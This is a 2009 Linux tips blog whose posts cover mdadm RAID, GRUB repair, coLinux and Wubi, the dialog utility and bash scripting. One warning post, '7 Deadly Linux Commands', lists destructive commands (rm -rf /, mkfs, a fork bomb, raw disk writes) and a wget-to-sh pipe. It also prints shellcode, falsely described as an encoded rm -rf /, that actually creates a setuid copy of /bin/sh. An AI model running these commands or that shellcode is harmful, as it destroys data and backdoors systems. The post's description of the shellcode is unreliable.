md1 : active raid1 sdb3[1] sda3[0]

19542976 blocks [2/2] [UU]

md2 : active raid1 sdb4[1] sda4[0]

223504192 blocks [2/2] [UU]

Here we can see that both drives are used and working fine (U). A failed drive will show as (F), and a degraded array will show the missing disk as _ (for example [U_]).

Note: while a RAID array is rebuilding, monitoring its status using watch can be useful:

watch cat /proc/mdstat

6. Stop and delete a RAID array

If we want to completely remove a RAID array, we have to stop it first and then remove it:

mdadm --stop /dev/md0

mdadm --remove /dev/md0

and finally we can even delete the superblock from the individual drives:

mdadm --zero-superblock /dev/sda

Finally, when using RAID1 arrays, where we create identical partitions on both drives, this can be useful to copy the partition table from sda to sdb:

sfdisk -d /dev/sda | sfdisk /dev/sdb

(This will dump the partition table of sda onto sdb, completely removing the existing partitions on sdb, so be sure you want this before running the command, as it will not warn you at all.)
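
Before running it, it can be worth dumping sdb's current partition table to a file so you have something to refer back to (a sketch):

sfdisk -d /dev/sdb > sdb-partition-table.backup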

There are many other uses of mdadm particular to each RAID level, and I would recommend the manual page (man mdadm) or the help (mdadm --help) if you need more details on its usage. Hopefully these quick examples will put you on the fast track to how mdadm works.

GRUB repair tips

 

One of the most common problems when you have a dual-boot setup is a dreaded GRUB error message at boot up. This can happen, for instance, if you resize a partition using programs like GParted in Linux. The thing is, you cannot resize your Linux partition while you're using it, so to do this you have to boot a live distro to make changes to existing partitions.

So, OK, we resized or deleted a partition and allocated the free space to expand the drive. Now, in some cases like mine recently, the system is dual-booting; one of my systems dual-booted XP Pro / Ubuntu 8.10.

I decided to delete the XP Pro partition and resize my Linux one... then I hit a problem at boot up.

I got the dreaded "GRUB loading error 22" message and could not boot into any OS on the system, so I had to manually repair the GRUB boot loader. Here is what I did; it might help others who have the same problem.

This is not new, and it is a well-documented Linux procedure; I'm just writing it up here in case anyone has the same problem I did.

OK, let's begin:

1) Boot from a live distro, e.g. Ubuntu.

2) Open a console.

3) Type in: sudo grub

4) Type in: root (hd and hit the TAB key.

This will then show you what physical drives you have, usually returning something like:

root (hd0, or hd1,

Hit TAB again and it will list possible partitions, similar to this:

grub> root (hd0,

Possible partitions are:

Partition num: 0, Filesystem type unknown, partition type 0x7

Partition num: 2, Filesystem type is ext2fs, partition type 0x83

Partition num: 4, Filesystem type unknown, partition type 0x7

Partition num: 5, Filesystem type is fat, partition type 0xb

Partition num: 6, Filesystem type is fat, partition type 0xb

Partition num: 7, Filesystem type unknown, partition type 0x82

The one we're interested in is number 2, with ext2fs... this is the one Linux is installed on.

so we type

root(hd0,2)

*caution*

Provided hd0 is the main physical drive; remember it could be hd1!

Ok so after you have typed root(hd0,2)

Now you need to type:

setup (hd0)
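
Putting the whole session together, it looks roughly like this (a sketch; (hd0,2) depends on what the TAB listing showed on your machine):

sudo grub

grub> root (hd0,2)

grub> setup (hd0)

grub> quit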

Close the terminal, exit the live CD and reboot; you should have your GRUB loader repaired.

REMEMBER: this is for repairing Linux, NOT Windows. If you deleted a Linux partition and are getting a GRUB loading error message, you need to reset the MBR instead.

Saturday, December 12, 2009

7 Deadly Linux Commands

1. Code:

   rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code: 

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is a hex-encoded version of [rm -rf /] that can deceive even rather experienced Linux users.

3. Code:
mkfs.ext3 /dev/sda

This will reformat the device mentioned after the mkfs command, wiping out all the files on it.

4. Code:

:(){:|:&};:

Known as a fork bomb, this command tells your system to spawn a huge number of processes until the system freezes. This can often lead to data corruption.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources and then execute the possibly malicious code they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.
There are of course other equally deadly Linux commands that I failed to include here, so if you have something to add, please share it with us in a comment.

Linux Viruses

“So, if until now you were thinking that your Linux distro is immune to viruses, it's time to think again.”

Studies have shown that Linux can also be affected by viruses, although it is somewhat rare. So it is better to be prepared with an antivirus.

As for antivirus applications, some popular ones such as the open source ClamAV and the freeware Avast! and AVG are available for Linux. ClamAV can be installed from the repositories if you're using Ubuntu, but Avast! and AVG must be downloaded from the antivirus vendor's site.
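
For example, on Ubuntu a minimal ClamAV setup and a scan of your home directory would look roughly like this (a sketch; package names can vary between releases):

sudo apt-get install clamav

sudo freshclam

clamscan -r $HOME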

This is a list of currently known Linux trojans, viruses, and worms:

Trojans

* Kaiten – Linux.Backdoor.Kaiten trojan horse
* Rexob – Linux.Backdoor.Rexob trojan

Viruses

* Alaeda – Virus.Linux.Alaeda
* Bad Bunny – Perl.Badbunny
* Binom – Linux/Binom
* Bliss
* Brundle
* Bukowski
* Diesel – Virus.Linux.Diesel.962
* Kagob a – Virus.Linux.Kagob.a
* Kagob b – Virus.Linux.Kagob.b
* MetaPHOR (also known as Simile)
* Nuxbee – Virus.Linux.Nuxbee.1403
* OSF.8759
* Podloso – Linux.Podloso (The iPod virus)
* Rike – Virus.Linux.Rike.1627
* RST – Virus.Linux.RST.a
* Satyr – Virus.Linux.Satyr.a
* Staog
* Vit – Virus.Linux.Vit.4096
* Winter – Virus.Linux.Winter.341
* Winux (also known as Lindose and PEElf)
* ZipWorm – Virus.Linux.ZipWorm

Worms

* Adm – Net-Worm.Linux.Adm
* Adore
* Cheese – Net-Worm.Linux.Cheese
* Devnull
* Kork
* Linux/Lion (also known as Ramen)
* Mighty – Net-Worm.Linux.Mighty
* Millen – Linux.Millen.Worm
* Slapper
* SSH Bruteforce

Thursday, December 10, 2009

Topics for Linux admin Job

 

If you are preparing for Linux admin job interviews, you should be familiar with the concepts below.

1) Port number of different servers {cat /etc/services}

2) Linux Installation(through FTP,HTTP,NFS)

3) Boot process

4) Diff b/w ext3 and ext2

5) RAID LEVELS and Selection of raid

6) backup methods

7) Package management such as Yum server

8) Kernel Tuning

9) IPTABLES

10) TCP WRAPPERS

11) DIFFERENT RUN LEVELS

12) USER AND GROUP MANAGEMENT

13) QUOTA SETTING(user and group)

14) DIFF B/W CRON AND AT

15) BASIC SHELL SCRIPTING

16) Troubleshooting different issues.

17) Tell me why we should hire you?

18) DAILY ACTIVITES IN YOUR CURRENT COMPANY

19) RECENTLY SOLVED CRITICAL ISSUE

20) LVM (Very Imp)

21) Veritas Volume Manager

22) Cluster basics like HAD, GAB, LLT, heartbeat, config files, resources, service groups, etc.

23 ) kernel panic troubleshooting

24) Process management

25) Configuration of NFS, NIS, Samba, DHCP, DNS, Apache, Sendmail, etc.

26)Remote administration experience.

And many more, depending on your job profile. You should know every topic you mention in your resume. If you are not sure about something, don't mention it in your resume; your resume should reflect your skills.

Wednesday, December 9, 2009

Linux on Windows: Part-2 (Colinux)

 


Cooperative Linux is the first working free and open source method for optimally running Linux on Microsoft Windows natively. More generally, Cooperative Linux (short-named coLinux) is a port of the Linux kernel that allows it to run cooperatively alongside another operating system on a single machine. For instance, it allows one to freely run Linux on Windows 2000/XP/Vista/7, without using commercial PC virtualization software such as VMware, in a way which is much more optimal than using any general purpose PC virtualization software. In its current condition, it allows us to run the KNOPPIX Japanese Edition on Windows.

Step by Step Guide to install and configure Colinux on your PC:

In this post I will explain how to download, install and configure coLinux with a Debian 4.0 file system image. It can be seen as an alternative to a conventional "dual boot" configuration, but with both systems running at the same time.

NOTE: This is a really long post; continue only if you can spare some time for it.

Download and installation

You can download the latest version of CoLinux binary from the following link:

http://sourceforge.net/projects/colinux/files/coLinux-stable/

I will be using the stable version 0.7.3 (kernel 2.6.22.18).

Here you can find some file system images; go for the image you feel comfortable with:

http://sourceforge.net/projects/colinux/files/

Screenshots of installation steps:

 

[installation screenshots]

During the installation the WinPcap (The Windows Packet Capture Library) is installed.

[screenshot]

We can download (some of) available filesystem images directly during the installation:

[screenshot]

The TAP network adapter is installed (if any hardware installation warning appears, click "Continue Anyway"):

[screenshot]

Now the TAP adapter is installed (but not connected):

[screenshot]

We have to configure the private IP address of the host system (windows):

[screenshot]

Installation paths:

CoLinux binary: c:\programs\coLinux

Filesystem images: c:\programs\coLinux\images

Configure (Windows side):

Config file:

We create a new configuration file (just modify the installed example.conf):

C:\> cd programs\coLinux

C:\programs\coLinux> copy example.conf debian.conf

1 file(s) copied.

C:\programs\coLinux> notepad debian.conf

Now we can specify the root image, the swap file and possibly other mount points, and also define two ethernet devices - one for the pcap bridge and a second for the TAP adapter:

...

# File contains the root file system.

# Download and extract preconfigured file from SF "Images for 2.6".

cobd0="C:\programs\coLinux\images\Debian-4.0r0-etch.ext3.1gb"

cofs1=c:\

cofs2=d:\

# Swap device, should be an empty file with 128..512MB.

cobd1="C:\programs\coLinux\images\swap_file.1gb"

# Tell kernel the name of root device (mostly /dev/cobd0,

# /dev/cobd/0 on Gentoo)

# This parameter will be forward to Linux kernel.

root=/dev/cobd0

# Additional kernel parameters (ro = rootfs mount read only)

ro

# Initrd installs modules into the root file system.

# Need only on first boot.

initrd=initrd.gz

# Maximal memory for linux guest

#mem=64

# Slirp for internet connection (outgoing)

# Inside running coLinux configure eth0 with this static settings:

# ipaddress 10.0.2.15 broadcast 10.0.2.255 netmask 255.255.255.0

# gateway 10.0.2.2 nameserver 10.0.2.3

#eth0=slirp

# pcap bridge for internet connection (outgoing)

eth0=pcap-bridge,"Local Area Connection",<an-artificial-mac-address>

# Tuntap as private network between guest and host on second linux device

eth1=tuntap

# Setup for serial device

#ttys0=COM1,"BAUD=115200 PARITY=n DATA=8 STOP=1 dtr=on rts=on"

# Run an application on colinux start (Sample Xming, a Xserver)

# exec0=C:\Programs\Xming\Xming.exe,":0 -clipboard -multiwindow -ac"

Swap file:

You also have to create a swap file; http://colinux.wikia.com/wiki/HowtoCreateSwapFile describes how to create it, or, if you are lazy like me, you can download one from http://gniarf.nerim.net/colinux/swap/
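
If you prefer to create the swap file yourself on the Windows host, one possible way (assuming the standard fsutil tool is available) is to pre-allocate a 1 GB file matching the name used in debian.conf:

C:\programs\coLinux> fsutil file createnew images\swap_file.1gb 1073741824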

Configure (Linux side):

Start colinux daemon:

C:\programs\coLinux> colinux-daemon.exe @debian.conf

Cooperative Linux Daemon, 0.7.3

Daemon compiled on Sat May 24 22:36:07 2008

PID: 3268

error 0x2 in execution

error launching console

daemon: exit code 8200c401

daemon: error - CO_RC_ERROR_ERROR, line 49, file src/colinux/os/winnt/user/exec.c (16)

We did not install the generic console so we have to explicitly say we want to launch the NT console:

C:\programs\coLinux> colinux-daemon.exe -t nt @debian.conf

Login as root (a default password is "root"):

login as: root

root@10.0.2.2's password:

Linux debian 2.6.22.18-co-0.7.3 #1 PREEMPT Sat May 24 22:27:30 UTC 2008 i686

The programs included with the Debian GNU/Linux system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent

permitted by applicable law.

Change the root password

deb# passwd

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

Network

For ease of use, the network is pre-configured for "slirp":

deb# ifconfig

eth0 Link encap:Ethernet HWaddr 22:01:76:23:42:12

inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:59 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:20682 (20.1 KiB) TX bytes:0 (0.0 b)

Interrupt:2

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

We change it to dual-ethernet mode (one interface for the outside-world connection and the other for a private network between the guest and the host system):

deb# nano /etc/network/interfaces

Comment out the following:

# The primary network interface (slirp)

auto eth0

iface eth0 inet static

address 10.0.2.15

broadcast 10.0.2.255

netmask 255.255.255.0

gateway 10.0.2.2

And replace it with following:

# The primary network interface

auto eth0

iface eth0 inet dhcp

Then there is the following:

# Second network (tap-win32)

#auto eth1

#iface eth1 inet static

# address 192.168.0.40

# netmask 255.255.255.0

... leave it as is (or remove it) and add the following:

auto eth1

iface eth1 inet static

address 10.0.2.2

network 10.0.2.0

netmask 255.255.255.0

broadcast 10.0.2.255

Now save the file and reboot:

deb# reboot

We should see now on the Windows side that the TAP adapter is connected:

[screenshot]

After we login to linux, we can examine the new network configuration:

deb# ifconfig

eth0 Link encap:Ethernet HWaddr <an-artificial-mac-address>

inet addr:192.168.1.196 Bcast:192.168.1.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:17220 errors:0 dropped:0 overruns:0 frame:0

TX packets:11031 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:24760203 (23.6 MiB) TX bytes:770417 (752.3 KiB)

Interrupt:2

eth1 Link encap:Ethernet HWaddr 00:FF:68:B7:70:00

inet addr:10.0.2.2 Bcast:10.0.2.255 Mask:255.255.255.0

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1

RX packets:17 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:1000

RX bytes:2238 (2.1 KiB) TX bytes:0 (0.0 b)

Interrupt:2

lo Link encap:Local Loopback

inet addr:127.0.0.1 Mask:255.0.0.0

UP LOOPBACK RUNNING MTU:16436 Metric:1

RX packets:0 errors:0 dropped:0 overruns:0 frame:0

TX packets:0 errors:0 dropped:0 overruns:0 carrier:0

collisions:0 txqueuelen:0

RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

Packaging system

Now (we are connected to the internet) it is time to update the package system and upgrade installed packages:

deb# apt-get update

...

deb# apt-get upgrade

The following packages will be upgraded:

bsdutils cpio debconf debconf-i18n debian-archive-keyring dpkg e2fslibs

e2fsprogs findutils initscripts libblkid1 libc6 libcomerr2 libgnutls13

libpam-modules libpam-runtime libpam0g libss2 libuuid1 lsb-base mount nano

perl-base sysv-rc sysvinit sysvinit-utils tar tzdata util-linux

29 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.

Need to get 12.3MB of archives.

After unpacking 1786kB disk space will be freed.

Do you want to continue [Y/n]? Y

...

Mount table

Now we can modify the mount table:

deb# nano /etc/fstab

... add the following if you want to mount the C: and D: Windows drives (we made them available as cofs devices in the debian.conf file):

cofs1 /mnt/c cofs defaults,noatime 0 0

cofs2 /mnt/d cofs defaults,noatime 0 0
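
Note that the mount points themselves have to exist before mount can use them; a quick sketch:

deb# mkdir -p /mnt/c /mnt/d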

Now the command:

deb# mount -a

... works as expected.

 

Now go and try it yourself!

Linux on windows part –1 (Wubi)

 

From the time I started using Linux, I was using it only under virtualization software, mostly VMware Workstation/Player. A few days ago I thought of trying an alternative to VMware Workstation (it's not that I don't like it; this was just for exploration). As I already had some experience with Microsoft's Virtual PC and Sun Microsystems' VirtualBox, I started my journey in a different way. After a day of exploration (using Google) and a few hours of experimentation, I finally succeeded in running Linux without using any virtualization software.

The two solutions I found for running Linux without virtualization software are:

1) Colinux (Co-operative Linux).

2) Wubi (Windows-based Ubuntu Installer)

So in this post I'll explain how to use them on your PC, starting with the latter, because it is the easier of the two to install.


Wubi (Windows-based Ubuntu Installer) is an official Windows-based free software installer for Ubuntu. Wubi can bring you to the Linux world with a single click. Wubi allows you to install and uninstall Ubuntu as any other Windows application, in a simple and safe way. Are you curious about Linux and Ubuntu?

You can download the latest version of Wubi from either of the following links:

http://wubi-installer.org/latest.php

(or)

http://www.softpedia.com/progDownload/Wubi-Download-79148.html

For installation you have to do nothing special: just double-click the installer, select the place where you want to install Ubuntu, and provide a username and password. That's it; within a few minutes you will be ready to use Ubuntu.

Features of Wubi:

1) Wubi is Safe

Wubi does not require you to modify the partitions of your PC, or to use a different boot loader.

2) Wubi is Simple

Just run the installer, no need to burn a CD.

3) Wubi is Discrete

Wubi keeps most of the files in one folder, and if you do not like it, you can simply uninstall it.

4) Wubi is Free

Wubi (like Ubuntu) is free as in beer and as in freedom. You will get this part later on, the important thing now is that it cost absolutely nothing, it is our gift to you...

5) What flavor of Ubuntu will I get?

Most flavors, including Ubuntu (default, with GNOME), Kubuntu (with KDE), Xubuntu (with XFCE for older computers), Edubuntu (good for schools and younger users) and UbuntuStudio (for multimedia workstations).

6) What is the difference among the different Ubuntu flavors?

Mostly the graphical user interface is different, and the bundled applications may change so that they better integrate with the installed interface. More information can be found at the homepages for GNOME, KDE, and XFCE.

7) Can I install multiple flavors?

You can select the desktop environment within Wubi. But since each desktop environment is also available as an application package, it is recommended to install Ubuntu (default option) and from there install the other desktop environments. When you login you can choose the desktop environment to use.

8) What applications come with Ubuntu?

Ubuntu comes fully loaded with most commonly used applications, including a full office suite compatible with MS office, image editing software, picture management software, media player, games, browser, email client, IM and video conferencing software... On top of all of this, you can easily install additional software, from a list of over 20,000 applications.

Screenshots:

Screenshot showing starting of the installation:

[screenshot]

Screenshot showing end of the installation:

[screenshot]

Requirements:

· 256 MB RAM

· 1 GHz or faster Intel/AMD processor

· A minimum of 4GB disk space

Source : http://wubi-installer.org/

 

That's all, buddies… In the next post I'll be explaining how to use Colinux.

Tuesday, December 8, 2009

Super Grub Disk

 

Super Grub Disk is a bootable floppy or CD-ROM oriented towards system rescue, specifically for repairing the booting process.
It is simply a GRUB disk with a lot of useful menus.
It can activate partitions, boot partitions, boot MBRs, boot your former OS (Linux or another one) by loading menu.lst from your hard disk, automatically restore GRUB on your MBR, swap hard disks in the BIOS, and boot from any available disk device.
The project has multi-language support and allows you to change the keyboard layout of its shell.

You can download the super grub disk from here:

grub-rescue-cdrom.iso

super_grub_disk_0.9798.iso

Monday, December 7, 2009

Open source Virtualization

OS Virtualization

Make your bash scripts user friendly using – dialog

 

If you have installed Linux using the text installer, then you will have seen a neat, professional-looking install process. You can rest assured that nothing extreme went into programming that installer; in fact, it was created using a utility called dialog. Dialog is a utility installed by default on all major Linux distributions. It is used to create professional-looking dialog boxes from within shell scripts.

Some of the dialogs supported are Input boxes, Menu, checklist boxes, yes/no boxes, message boxes, radio list boxes and text boxes.

Creating a dialog is very easy. Here I will explain how to create dialog boxes of different types.

[Note: First of all, check whether the dialog package is installed on your machine.

Type: rpm -qa dialog*

If you find that the package is not installed, then install it manually using one of the following commands,

depending on your convenience and the type of your distribution.

rpm -ivh dialog* (in case you have the dialog rpm file on your machine)

Or

yum install dialog

Or

apt-get install dialog ]

Input boxes: These allow the user to enter a string. After the user enters the data, it is written to standard error. You may also redirect the output to a file.

$ dialog --title "Ravi's Input Box"

--inputbox "Enter the parameters..." 8 40

As you can see, the options are self explanatory. The last two options 8 and 40 are the height and width of the box respectively.

[Figure: Input box]
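Since dialog writes the user's entry to standard error, a common pattern is to redirect stderr to a temporary file and read it back. Here is a minimal sketch; the file name /tmp/answer.txt is just an example:

$ dialog --title "Ravi's Input Box" \
    --inputbox "Enter the parameters..." 8 40 2> /tmp/answer.txt
$ answer=$(cat /tmp/answer.txt)
$ echo "You entered: $answer"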

Textbox: This is a box which takes a file as the parameter and shows the file in a scrollable box.

$ dialog --title "textbox" --textbox ./myfile.txt 22 70

... it shows the file myfile.txt in a textbox.

[Figure: Textbox showing the file]

Checklist: The user is presented with a list of choices and can toggle each one on or off individually using the space bar.

$ dialog --checklist "Choose your favorite distribution:" \
    10 40 3 \
    1 RedHat on \
    2 "Ubuntu Linux" off \
    3 Slackware off

... here, 10 is the height of the box, 40 - width, 3 is the number of choices, and the rest are the choices numbered 1,2 and 3.

Radio list: It displays a list of radio buttons, from which the user can choose only one option.

$ dialog --backtitle "Processor Selection" \
    --radiolist "Select Processor type:" \
    10 40 4 \
    1 Pentium off \
    2 Athlon on \
    3 Celeron off \
    4 Cyrix off

10 and 40 are the height and width respectively. 4 denotes the number of items in the list.

Infobox: This is useful for displaying a message while an operation is going on. For example, see the code below:

$ dialog --title "Memory Results"

--infobox "`echo ;vmstat;echo ;echo ;free`"

15 85

[Figure: Information box listing the vmstat and free output]

[Figure: Message box]

Dialog is usually used inside a script, which gives the script a degree of user friendliness. There is another package called Xdialog which provides the same features for scripts run under the X Window System; Xdialog also has additional functionality not found in the dialog utility.
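As a rough sketch of how dialog fits into a script, the example below asks a yes/no question and branches on dialog's exit status (0 when the user chooses Yes). The script name and the /tmp/myapp path are made up for illustration:

#!/bin/bash
# confirm_cleanup.sh - ask for confirmation before removing temporary files
dialog --title "Confirmation" --yesno "Delete all files in /tmp/myapp?" 7 50
if [ $? -eq 0 ]
then
    # exit status 0 means the user pressed "Yes"
    rm -rf /tmp/myapp/*
    dialog --msgbox "Temporary files removed." 6 40
else
    dialog --msgbox "Nothing was deleted." 6 40
fi
clear    # clean up the screen left behind by dialog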

To know more about the dialog utility check the man page of dialog.

Quick editing of a command in Bash

Sometimes when you type a long command, it wraps beyond the screen. If you then want to modify the command and re-execute it, there is an easy way: just type "fc", which loads the command into your default editor (vi, in my case). Modify the command in the editor, exit, and the modified command is executed automatically.

For example try typing the following command in the bash shell and type "fc".

$ find /etc -iname '*.conf' -exec grep -H 'log' {} \;

$ fc

"fc" will bring the last command typed into an editor, "vi" if that's the default editor. Of course you can specify a different editor by using the -e switch as follows:

$ fc -e emacs

To list last few commands, type:

$ fc -l

For the last 10 commands it will be:

$ fc -l -10

To search for a command, type "CTRL+r" at the shell prompt to start a search-as-you-type prompt. Once you have found your command, press Enter to execute it.

If you want to transpose two characters, say you typed 'sl' instead of 'ls', then place the cursor between the two characters and type "CTRL+t".

Sunday, December 6, 2009

Bash Shell Shortcuts

Bash, which is the default shell in Linux, contains a whole lot of key bindings which make it really easy to use. The most commonly used shortcuts are listed below:

____________CTRL Key Bound_____________

Ctrl + a - Jump to the start of the line

Ctrl + b - Move back a char

Ctrl + c - Terminate the command

Ctrl + d - Delete from under the cursor

Ctrl + e - Jump to the end of the line

Ctrl + f - Move forward a char

Ctrl + k - Delete to EOL

Ctrl + l - Clear the screen

Ctrl + r - Search the history backwards

Ctrl + r (again, while searching) - Step back through further matches in the history

Ctrl + u - Delete backward from cursor

Ctrl + xx - Toggle between the start of the line and the current cursor position

Ctrl + x @ - Show possible hostname completions

Ctrl + z - Suspend/ Stop the command

____________ALT Key Bound___________

Alt + < - Move to the first line in the history

Alt + > - Move to the last line in the history

Alt + ? - Show current completion list

Alt + * - Insert all possible completions

Alt + / - Attempt to complete filename

Alt + . - Yank last argument to previous command

Alt + b - Move backward

Alt + c - Capitalize the word

Alt + d - Delete word

Alt + f - Move forward

Alt + l - Make word lowercase

Alt + n - Search the history forwards non-incremental

Alt + p - Search the history backwards non-incremental

Alt + r - Recall command

Alt + t - Move words around

Alt + u - Make word uppercase

Alt + back-space - Delete backward from cursor

----------------More Special Key bindings-------------------

Here "2T" means Press TAB twice

$ 2T - All available commands (common)

$ (string) 2T - All available commands starting with (string)

$ /2T - Entire directory structure including Hidden one

$ ./2T - Only Sub Dirs inside, including hidden ones

$ *2T - Only Sub Dirs inside without Hidden one

$ ~2T - All Present Users on system from "/etc/passwd"

$ $2T - All Sys variables

$ @2T - Entries from "/etc/hosts"

$ =2T - Output like ls or dir

So now that you know the shortcuts, you can save loads of time by using them in your daily work.

10 Seconds Guide to Bash Shell Scripting

First let me clarify that this is not going to be a detailed study of shell scripting, but as the name of the post indicates, it will be a quick reference to the syntax used in scripting for the bash shell. So if you are expecting the former, then you should buy yourself a good book on shell scripting. ;-) So let's move on to the guide. Start your stop watch now.

-- Start of The 10 secs Guide to Bash Scripting --

Common environment variables

PATH - Sets the search path for any executable command. Similar to the PATH variable in MSDOS.

HOME - Home directory of the user.

MAIL - Contains the path to the location where mail addressed to the user is stored.

IFS - Contains the string of characters that are used as word separators on the command line. The string normally consists of the space, tab and newline characters. To see them you will have to do an octal dump as follows (a short word-splitting example appears after this section):

$ echo "$IFS" | od -bc

PS1 and PS2 - Primary and secondary prompts in bash. PS1 is set to $ by default and PS2 is set to '>' . To see the secondary prompt, just run the command:

$ ls |

... and press enter.

USER - User login name.

TERM - indicates the terminal type being used. This should be set correctly for editors like vi to work correctly.

SHELL - Determines the type of shell that the user sees on logging in.

Note: To see the values held by the above environment variables, just do an echo of the name of the variable preceded by a $. For example, if I do the following:

$ echo $USER

Deja vu

... I get the value stored in the environment variable USER.
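Here is the short word-splitting sketch mentioned above: setting IFS to ':' makes the shell split $PATH on colons instead of whitespace. This is a minimal illustration assuming nothing beyond bash itself:

#!/bin/bash
# Print each directory in PATH on its own line by splitting on ':'
OLDIFS=$IFS
IFS=:
for dir in $PATH
do
    echo "$dir"
done
IFS=$OLDIFS    # restore the original separators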

Some bash shell scripting rules

1) The first line in your script must be

#!/bin/bash

... that is, a # (hash) followed by a ! (bang) followed by the path of the shell. This line lets the environment know that the file is a shell script and where the shell is located.

2) Before executing your script, you should make the script executable. You do it by using the following command:

$ chmod ugo+x your_shell_script.sh

3) The name of your shell script should end with .sh. This lets the user know that the file is a shell script. It is not compulsory, but it is the norm. (A minimal script that follows these rules is shown below.)
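Putting the three rules together, a minimal first script might look like this (hello.sh is just an example name):

$ cat hello.sh
#!/bin/bash
# hello.sh - prints a short greeting
echo "Hello from $USER"

$ chmod ugo+x hello.sh
$ ./hello.sh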

Conditional statements

The 'if' statement - evaluates a condition which accompanies its command line. In the syntax below, the keywords if, then and fi are compulsory, while the else branch is optional.

syntax:

if condition_is_true

then

execute commands

else

execute commands

fi

The if construct also permits multiway branching; that is, you can evaluate further conditions if the previous condition fails.

if condition_is_true

then

execute commands

elif another_condition_is_true

then

execute commands

else

execute commands

fi

Example :

if grep "linuxhelp" thisfile.html

then

echo "Found the word in the file"

else

echo "Sorry no luck!"

fi

if's companion - test

test is an internal feature of the shell. test evaluates the condition placed on its right, and returns either a true or false exit status. For this purpose, test uses certain operators to evaluate the condition. They are as follows:

Relational operators

-eq Equal to

-ne Not equal to

-gt Greater than

-ge Greater than or equal to

-lt Less than

-le Less than or equal to

File related tests

-f file True if file exists and is a regular file

-r file True if file exists and is readable

-w file True if file exists and is writable

-x file True if file exists and is executable

-d file True if file exists and is a directory

-s file True if file exists and has a size greater than zero.

String tests

-n str True if string str is not a null string

-z str True if string str is a null string

str1 == str2 True if both strings are equal

str1 != str2 True if both strings are unequal

str True if string str is assigned a value and is not null.

Test also permits the checking of more than one expression in the same line.

-a Performs the AND function

-o Performs the OR function

Example:

test $d -eq 25 && echo $d

... which means: if the value in the variable d is equal to 25, print the value.

test $s -lt 50 && do_something

if [ $d -eq 25 ]

then

echo $d

fi

In the above example, I have used square brackets instead of the keyword test - which is another way of doing the same thing.

if [ "$str1" == "$str2" ]

then

do something

fi

if [ -n "$str1" -a -n "$str2" ]

then

echo 'Both $str1 and $str2 are not null'

fi

... above, I have checked if both strings are not null then execute the echo command.

Things to remember while using test

If you are using square brackets [] instead of test, then care should be taken to insert a space after the [ and before the ].

Note: test is confined to integer values only. Decimal values are simply truncated.

Do not use wildcards for testing string equality - they are expanded by the shell to match the files in your directory rather than the string.
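For instance, quoting both sides keeps the shell from expanding a pattern such as *.txt into matching file names before test sees it. A small sketch:

pattern="*.txt"
if [ "$pattern" == "*.txt" ]    # quoted, so both sides are compared as literal strings
then
    echo "The strings match"
fi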

Case statement

Case statement is the second conditional offered by the shell.

Syntax:

case expression in

pattern1) execute commands ;;

pattern2) execute commands ;;

...

esac

The keywords here are case, in and esac. The ';;' is used as an option terminator. The construct also uses ')' to delimit the pattern from the action.

Example:

...

echo "Enter your option : "

read i;

case $i in

1) ls -l ;;

2) ps -aux ;;

3) date ;;

4) who ;;

5) exit

esac

Note: The last case option need not have ;; but you can provide them if you want.

Here is another example:

case `date |cut -d" " -f1` in

Mon) commands ;;

Tue) commands ;;

Wed) commands ;;

...

esac

Case can also match more than one pattern with each option. You can also use shell wildcards for matching patterns.

...

echo "Do you wish to continue? (y/n)"

read ans

case $ans in

Y|y) ;;

[Yy][Ee][Ss]) ;;

N|n) exit ;;

[Nn][Oo]) exit ;;

*) echo "Invalid command"

esac

In the above case, if you enter YeS, YES, yEs or any other combination of upper and lower case, it will be matched.

This brings us to the end of conditional statements.

Looping Statements

while loop

Syntax :

while condition_is_true

do

execute commands

done

Example:

while [ $num -gt 100 ]

do

sleep 5

done

while :

do

execute some commands

done

The above code implements an infinite loop. You could also write 'while true' instead of 'while :'.

Here I would like to introduce two keywords with respect to looping conditionals. They are break and continue.

break - This keyword causes control to break out of the loop.

continue - This keyword skips the statements that follow it in the loop body and switches control to the top of the loop for the next iteration.
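A small sketch using both keywords inside a while loop: even numbers are skipped with continue, and the loop stops with break once the counter passes 7.

#!/bin/bash
num=0
while true
do
    num=$((num + 1))
    if [ $((num % 2)) -eq 0 ]
    then
        continue    # skip even numbers and start the next iteration
    fi
    if [ $num -gt 7 ]
    then
        break       # leave the loop completely
    fi
    echo "Odd number: $num"
done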

until loop

